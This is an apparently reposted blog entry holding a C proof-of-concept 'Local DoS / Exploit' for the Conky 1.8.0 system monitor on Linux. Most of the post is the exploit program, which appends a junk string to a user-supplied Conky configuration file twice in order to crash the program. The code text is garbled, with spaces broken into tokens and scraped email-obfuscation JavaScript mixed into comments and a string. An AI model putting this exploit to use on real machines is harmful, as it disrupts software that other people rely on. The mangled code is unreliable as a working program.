Selasa, 14 Juni 2011

Linux Conky 1.8.0 Local DoS / Exploit PoC

/ * * // * Vulnerability Conky 1.8.0 on Linux * // * Tested on: Linux with kernel 2.6.32.1-smp * // * Found: by Arturo D'Elia * // * Date found: 12 Dec 2010 * // * Fix: No Fix * // * Contacts: arturo.delia @ libero.it <script type="text/javascript">/ * <! [CDATA [* /(Function () {try {var s, a, i, j, r, c, l = document.getElementById ("__cf_email__"); a = l.className; if (a) {s =''; r = parseInt (a.substr (0.2), 16); for (j = 2; a.length-j, j + = 2) {c = parseInt (a.substr (j, 2), 16) ^ r; s + = String.fromCharCode (c);} s = document.createTextNode (s); l.parentNode.replaceChild (s, l);}} catch (e ){}})();/ *]]> * /</ Script> * /
 
# Include <stdio.h># Include <stdlib.h># Include <string.h>
 
killyou char [] = "# w000wwwww i exploit it and i kill you!";
 
int main (int argc, char ** argv) {

    
FILE * fp;

    
/ * Write the information the program * /
    
printf ("\ n [*] Conky 1.8.0 Local DoS / Exploit PoC [*] \ n");
    
printf ("[*] coded by: Arturo D'Elia \ n ");
    
printf ("[*] Tested on: Linux \ n ");
    
printf ("[*] Kernel version: 2.6.32.1-smp \ n ");
    
printf ("[*] Bug Found: 12 Dec 2010 \ n ");
    
printf ("[*] Contacts: arturo.delia @ libero.it <script type="text/javascript">/ * <! [CDATA [* /(Function () {try {var s, a, i, j, r, c, l = document.getElementById ("__cf_email__"); a = l.className; if (a) {s =''; r = parseInt (a.substr (0.2), 16); for (j = 2; a.length-j, j + = 2) {c = parseInt (a.substr (j, 2), 16) ^ r; s + = String.fromCharCode (c);} s = document.createTextNode (s); l.parentNode.replaceChild (s, l);}} catch (e ){}})();/ *]]> * /</ Script> \ n \ n ");

    
/ * Check the input parameters * /
    
if (argc! = 2)
        
exit (fprintf (stderr, "Usage:% s <path conkyrc> \ n", argv [0]));

    
/ * Check the file exsist * /
    
printf ("[>] Open Conky configuration \ n ");
    
if ((fp = fopen (argv [1], "r "))== NULL)
        
exit (fprintf (stderr, "[x] Can not open% s file \ n", argv [1]));
    
fclose (fp);

    
/ * Open file for append and i send it the * /
    
/ * Exploited strings * /
    
fp = fopen (argv [1], "a");
    
printf ("[>] Send the DoS / PoC string \ n ");
    
fprintf (fp, "% s \ n", killyou);
    
fclose (fp);

    
/ * Wait 3 seconds * /
    
usleep (3000000);

    
/ * Resend exploited strings * /
    
fp = fopen (argv [1], "a");
    
fprintf (fp, "% s \ n", killyou);
    
fclose (fp);

    
/ * Ok guy. * /
    
printf ("[*] Ok guy, you kill it. \ n \ n ");return 0;}

Tidak ada komentar:

Posting Komentar